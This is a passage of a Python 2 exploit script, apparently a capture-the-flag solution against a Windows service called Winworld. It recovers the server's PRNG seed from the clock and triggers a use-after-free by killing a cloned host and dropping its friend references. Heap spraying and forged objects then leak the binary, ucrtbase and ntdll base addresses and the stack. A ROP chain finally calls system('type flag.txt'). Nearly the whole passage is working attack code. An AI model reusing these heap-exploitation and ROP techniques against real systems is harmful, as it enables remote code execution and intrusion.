183 |         self.maze_x         = 0
184 |         self.maze_y         = 0
185 |         self.day            = 1
186 | 
187 |     def find_maze_center(self):
188 |         for row in range(MAX_ROWS):
189 |             self.park_map.append([0] * MAX_COLS)
190 | 
191 |         obstacles = ((MAX_ROWS * MAX_COLS) / 5) + (self.rand() % MAX_COLS)
192 | 
193 |         while obstacles:
194 |             pos_x = self.rand() % MAX_ROWS
195 |             pos_y = self.rand() % MAX_COLS
196 | 
197 |             if self.park_map[pos_x][pos_y]:
198 |                 continue
199 | 
200 |             self.park_map[pos_x][pos_y] = 1
201 |             obstacles -= 1
202 | 
203 |             if obstacles == 0:
204 |                 break
205 | 
206 |             nearby_obstacles = (self.rand() % 30) % obstacles
207 | 
208 |             while (nearby_obstacles):
209 |                 direction = self.rand() % 4
210 |                 pos_a = pos_x
211 |                 pos_b = pos_y
212 | 
213 |                 if direction == 0:
214 |                     pos_a -= 1
215 |                 elif direction == 1:
216 |                     pos_a += 1
217 |                 elif direction == 2:
218 |                     pos_b -= 1
219 |                 else:
220 |                     pos_b += 1
221 | 
222 |                 if pos_a < 0 or pos_a >= MAX_ROWS or pos_b < 0 or pos_b >= MAX_COLS:
223 |                     continue
224 | 
225 |                 pos_x = pos_a
226 |                 pos_y = pos_b
227 | 
228 |                 if self.park_map[pos_x][pos_y]:
229 |                     continue
230 | 
231 |                 self.park_map[pos_x][pos_y] = 1
232 |                 nearby_obstacles -= 1
233 |                 obstacles -= 1
234 | 
235 |         while True:
236 |             self.maze_x = self.rand() % MAX_ROWS
237 |             self.maze_y = self.rand() % MAX_COLS
238 | 
239 |             if self.park_map[self.maze_x][self.maze_y] == 0:
240 |                 break
241 | 
242 |     def rand(self):
243 |         return self.libc.rand()
244 | 
245 |     def craft_person(self, func_ptr, leak_addr, size):
246 |         payload  = struct.pack("<Q", func_ptr)        # func pointer
247 |         payload += "\x00" * 24                        # friends std::vector
248 |         payload += "\x00" * 24                        # sentences std::vector
249 | 
250 |         # std::string name
251 |         payload += struct.pack("<Q", leak_addr)
252 |         payload += "C" * 8
253 |         payload += struct.pack("<Q", size)            # size
254 |         payload += struct.pack("<Q", size)            # max_size
255 | 
256 |         payload += struct.pack("<I", 1)               # type = GUEST
257 |         payload += struct.pack("<I", 1)               # sex
258 |         payload += "\x01"                             # is_alive
259 |         payload += "\x01"                             # is_conscious
260 |         payload += "\x01"                             # is_enabled
261 |         payload += "\x01"                             # padding
262 |         payload += struct.pack("<I", 1337)            # days
263 |         payload += struct.pack("<I", 1337)            # moves
264 |         payload += struct.pack("<I", 1337)            # deaths
265 |         payload += struct.pack("<I", self.maze_x)     # pos_x
266 |         payload += struct.pack("<I", self.maze_y)     # pos_y
267 |         payload += struct.pack("<I", 1337)            # attack
268 |         payload += struct.pack("<I", 1337)            # health
269 |         payload += struct.pack("<I", 1337)            # max_health
270 |         payload += struct.pack("<I", 1337)            # luck
271 |         payload += struct.pack("<I", 0)               # sex_affinity
272 |         payload += struct.pack("<I", 0)               # padding
273 | 
274 |         return payload
275 | 
276 |     def leak_data(self, s):
277 |         sendline(s, "info h7")
278 |         readuntil(s, "Name: ")
279 |         leak = readuntil(s, "Type: male guest")
280 |         readuntil(s, "narrator [day 2]$")
281 |         return leak
282 | 
283 |     def spray_person(self, s, payload):
284 |         for i in range(LFH_spray_count):
285 |             print "\r0x%x / 0x%x ..." % (i + 1, LFH_spray_count),
286 |             sendline(s, payload)
287 |         print
288 | 
289 |         return self.leak_data(s)
290 | 
291 | 
292 |     def build_map(self, s):
293 |         print('[+] Discovering the PRNG seed...')
294 | 
295 |         readuntil(s, "--[ Welcome to Winworld, park no ")
296 |         prng_leak = int(readuntil(s, " ").split(" ")[0])
297 | 
298 |         seed = int(time.time())
299 |         self.libc = ctypes.CDLL(find_library('c'))
300 |         self.libc.srand(seed)
301 | 
302 |         if self.rand() % 1337 != prng_leak:
303 |             print '  Clock not synced with server...'
304 |             for i in range(-3000, 3000):
305 |                 bf_seed = seed + i
306 |                 self.libc.srand(bf_seed)
307 |                 if self.rand() % 1337 == prng_leak:
308 |                     print('[+] Resynced clock, delay of %d seconds' % i)
309 |                     break
310 |             else:
311 |                 print('[-] Synchronisation fail...')
312 |                 sys.exit(0)
313 | 
314 |         self.find_maze_center()
315 |         print('[+] Found the maze center: (%d, %d)' % (self.maze_x, self.maze_y))
316 | 
317 |         sendline(s, "map")
318 | 
319 |         readuntil(s, "----+\r\n")
320 |         data = readuntil(s, "+-----").split("+----")[0]
321 |         data = data.replace("|", "")
322 |         data = data.replace("\r", "")
323 |         data = data.split("\n")
324 |         self.array = []
325 | 
326 |         for line in data:
327 |             if len(line) < MAX_COLS:
328 |                 continue
329 |             row = []
330 |             for c in line:
331 |                 if c == ' ':
332 |                     row.append(0)
333 |                 else:
334 |                     row.append(1)
335 |             self.array.append(row)
336 | 
337 |         self.nmap = numpy.array(self.array)
338 |         self.end = (self.maze_x, self.maze_y)
339 | 
340 |     def create_dangling_person_ptr(self, s):
341 |         enable_LFH(s)
342 |         spray_data(s)
343 | 
344 |         print('[+] Cloning host, with uninitialized memory this one should have is_conscious...')
345 |         sendline(s, "clone h0 pwnrobot")
346 | 
347 |         guest_cnt = 0x10 - 6
348 |         pwnrobot_gid = 0x10 + 3
349 |         print('[+] Create some guests for later use...')
350 |         for i in range(guest_cnt):
351 |             sendline(s, "new guest male flood%d" % i)
352 | 
353 |         # put "the man in black" on the maze center
354 |         sendline(s, "info g0")
355 | 
356 |         readuntil(s, "Position: (")
357 |         data = readuntil(s, ")").split(")")[0].split(", ")
358 |         start = (int(data[0]), int(data[1]))
359 | 
360 |         print('[+] Moving a guest to the maze center {} -> {}...'.format(start, self.end))
361 | 
362 |         self.array[start[0]][start[1]] = 0
363 |         moves, directions_guest = get_directions(self.nmap, start, self.end)
364 | 
365 |         sendline(s, "move g0 " + moves)
366 | 
367 |         # put the pwn host on the maze center
368 | 
369 |         sendline(s, "info h7")
370 | 
371 |         readuntil(s, "Position: (")
372 |         data = readuntil(s, ")").split(")")[0].split(", ")
373 |         start = (int(data[0]), int(data[1]))
374 | 
375 |         print('[+] Moving our host to the maze center {} -> {}...'.format(start, self.end))
376 | 
377 |         self.array[start[0]][start[1]] = 0
378 |         moves, directions_host = get_directions(self.nmap, start, self.end)
379 | 
380 |         sendline(s, "move h7 " + moves)
381 | 
382 |         print('[+] pwnrobot should now be a human... kill him!')
383 | 
384 |         for i in range(10):
385 |             sendline(s, "move g0 lr")
386 | 
387 |         readuntil(s, "pwnrobot met a tragic death")
388 | 
389 |         sendline(s, 'fail')
390 |         readuntil(s, "fail")
391 | 
392 |         print('[+] Removing all pwnrobot\'s friends --> decrement its refcount to 0 --> free()')
393 | 
394 |         for i in range(7):
395 |             sendline(s, "friend remove g%d h%d" % (pwnrobot_gid, i))
396 | 
397 |         sendline(s, "info g3")
398 | 
399 |         sendline(s, "next_day")
400 |         self.day += 1
401 |         readuntil(s, "narrator [day 2]$")
402 | 
403 |     def get_empty_point(self):
404 |         for i in xrange(1, MAX_ROWS):
405 |             for j in xrange(1, MAX_COLS):
406 |                 if self.array[i][j] == 0:
407 |                     return(i,j)
408 |         assert False
409 | 
410 |     def prepare_uaf(self, s):
411 |         self.initialize()
412 |         self.build_map(s)
413 |         self.create_dangling_person_ptr(s)
414 | 
415 |     def leak_base_addr(self, s, obj_size=0x90):
416 |         for i in range(0xf0):
417 |             print "\r%d / %d ..." % (i + 1, 0xf0),
418 |             sendline(s, "D" * obj_size)
419 |         print
420 | 
421 |         print("[+] spray std::vectors to catch freed person, read pointer to main binary .rdata")
422 |         for i in range(8 * 2):
423 |             for j in range(7):
424 |                 sendline(s, "friend add g%d g%d" % (3 + i, 8 + 3 + j))
425 | 
426 |         print('[+] Trigger leak')
427 | 
428 |         sendline(s, "info h7")
429 |         readuntil(s, "Name: ")
430 | 
431 |         leak = readlen(s, 8)
432 |         binleak = struct.unpack("<Q", leak[:8])[0]
433 |         print('[+] Binary leak: %#x' % binleak)
434 |         binary_base = binleak - vtable_vector_offset
435 |         print('[+] Binary base: %#x' % binary_base)
436 |         assert(binary_base & 0xfff == 0)
437 |         self.binary_base = binary_base
438 | 
439 |     def trigger_arbitrary_read(self, s, addr_to_read):
440 |         payload = self.craft_person(func_ptr=self.gets_addr,
441 |                                         leak_addr=addr_to_read,
442 |                                         size=0x100)
443 |         sendline(s, "move h7 rl") # trigger gets
444 |         sendline(s, payload)
445 | 
446 |         return self.leak_data(s)
447 | 
448 |     def leak_ucrtbase(self, s):
449 |         print('[+] Leaking ucrtbase!strtol from IAT...')
450 |         iat_strtol = self.binary_base + iat_strtol_offset
451 | 
452 |         payload = self.craft_person(func_ptr=0x4242424242424242, leak_addr=iat_strtol, size=0x100)
453 |         leak = self.spray_person(s, payload)
454 |         
455 |         strtol = struct.unpack("<Q", leak[:8])[0]
456 |         
457 |         ucrtbase_base = strtol - strtol_offset
458 |         print('[+] ucrtbase!strtol: 0x%x' % strtol)
459 |         print('[+] ucrtbase base: %#x' % ucrtbase_base)
460 |         assert(ucrtbase_base & 0xfff == 0)
461 |         self.ucrtbase_base = ucrtbase_base
462 | 
463 |     def leak_ntdll(self, s):
464 |         iat_LdrpValidateUserCallTarget = self.binary_base + iat_LdrpValidateUserCallTarget_offset
465 |         payload = self.craft_person(func_ptr=self.gets_addr, leak_addr=iat_LdrpValidateUserCallTarget, size=0x100)
466 |         for i in xrange(0x400):
467 |             sendline(s, payload)
468 | 
469 |         leak = self.trigger_arbitrary_read(s, addr_to_read=iat_LdrpValidateUserCallTarget)
470 |         LdrpValidateUserCallTarget = struct.unpack("<Q", leak[:8])[0]
471 |         ntdll_base = LdrpValidateUserCallTarget - LdrpValidateUserCallTargetOffset
472 |         print('[+] ntdll!LdrpValidateUserCallTarget: 0x%x' % LdrpValidateUserCallTarget)
473 |         print('[+] ntdll base: 0x%x' % ntdll_base)
474 |         assert(ntdll_base & 0xfff == 0)
475 |         self.ntdll_base = ntdll_base
476 | 
477 |     def leak_stack(self, s):
478 |         leak = self.trigger_arbitrary_read(s, addr_to_read=self.binary_base + 0x1fbd0)
479 |         heap_ptr = struct.unpack("<Q", leak[:8])[0]
480 |         print("[+] heap_ptr == 0x%x" % heap_ptr)
481 | 
482 |         RtlCaptureContext = self.ntdll_base + 0x953d0
483 |         payload = self.craft_person(func_ptr=RtlCaptureContext, leak_addr=RtlCaptureContext, size=0x0)
484 |         for i in xrange(0x400):
485 |             sendline(s, payload)
486 | 
487 |         sendline(s, "move h7 lr")
488 |         sendline(s, "info h7")
489 | 
490 |         leak = readuntil(s, ", luck")        
491 |         leak = leak[leak.rfind("/"):]
492 |         leak = leak[1:leak.index(",")]
493 |         leak = int(leak, 10)
494 |         pwnrobot = (heap_ptr & 0xffffffff00000000) | (leak & 0xffffffff)
495 |         print("[+] pwnrobot == 0x%x" % pwnrobot)
496 | 
497 |         payload = self.craft_person(func_ptr=self.gets_addr,
498 |                                         leak_addr=pwnrobot + 0xb0,
499 |                                         size=0x100)
500 |         for i in xrange(0x400):
501 |             sendline(s, payload)
502 | 
503 |         leak = self.trigger_arbitrary_read(s, addr_to_read=pwnrobot + 0xb0)
504 |         self.stack_ptr = struct.unpack("<Q", leak[:8])[0]
505 | 
506 |         print("[+] stack_ptr == 0x%x" % self.stack_ptr)
507 | 
508 |         payload = self.craft_person(func_ptr=self.gets_addr,
509 |                                         leak_addr=self.stack_ptr - stack_main_offset,
510 |                                         size=0x1000)
511 |         for i in xrange(0x400):
512 |             sendline(s, payload)
513 | 
514 | 
515 |     def do_rop(self, s):
516 |         pop_all     = self.ntdll_base + 0x83690          # pop rdx ; pop rcx ; pop r8 ; pop r9 ; ret
517 |         pop_rcx     = self.ntdll_base + 0x83695          # pop rcx ; ret
518 |         pop_rbx_ret = self.ntdll_base + 0x1675           # pop rbx ; ret
519 |         add_rsp_38h = self.ntdll_base + 0x32d3           # add rsp, 0x38 ; ret
520 | 
521 |         raw_input("start rop?")
522 | 
523 |         # ROP to: system("type flag.txt")
524 |         payload = rop([
525 |             pop_rbx_ret,
526 |             self.stack_ptr - 0x2000,
527 | 
528 |             pop_all,
529 |             0x0,
530 |             "ABCDEFGH",                                  # buf          
531 |             0x0,
532 |             0x0,
533 | 
534 |             self.ucrtbase_base + SYSTEM_OFFSET,          # ucrtbase!system
535 |         ])
536 | 
537 |         payload += "C" * 60
538 |         payload = payload.replace("ABCDEFGH", struct.pack("<Q", self.stack_ptr - stack_main_offset + len(payload)))
539 |         payload += "type flag.txt\x00"
540 | 
541 |         sendline(s, "update h7 name " + payload)
542 | 
543 |         print('[+] Trigger ROP chain...')
544 | 
545 |         sendline(s, "quit")
546 | 
547 |         print("flag: ",)
548 |         try:
549 |             readuntil(s, "flag: ")
550 |             readall(s)
551 |         except:
552 |             pass
553 | 
554 | if __name__ == "__main__":
555 |     host = "127.0.0.1"
556 |     if len(sys.argv) > 1:
557 |         host = sys.argv[1]
558 | 
559 |     exploiter = ExploitWinworld()
560 |     print("-------------------- Phase0 - leak the main binary base addr --------------------")
561 |     s = get_s(host)
562 |     exploiter.prepare_uaf(s)
563 |     exploiter.leak_base_addr(s)
564 |     s.close()
565 | 
566 |     sleep(1)
567 |     s = get_s(host)
568 | 
569 |     print("-------------------- Phase1 - leak ucrtbase.dll base addr --------------------")    
570 |     exploiter.prepare_uaf(s)
571 |     exploiter.leak_ucrtbase(s)
572 |     exploiter.gets_addr = exploiter.ucrtbase_base + GETS_OFFSET
573 |     
574 |     print("-------------------- Phase2 - leak ntdll.dll base addr --------------------")
575 |     exploiter.leak_ntdll(s)
576 | 
577 |     print("-------------------- Phase3 - Execute code --------------------")
578 |     exploiter.leak_stack(s)
579 |     exploiter.do_rop(s)
580 | 
581 |     print("")
582 |     print('[+] Done')
583 |     s.close()


--------------------------------------------------------------------------------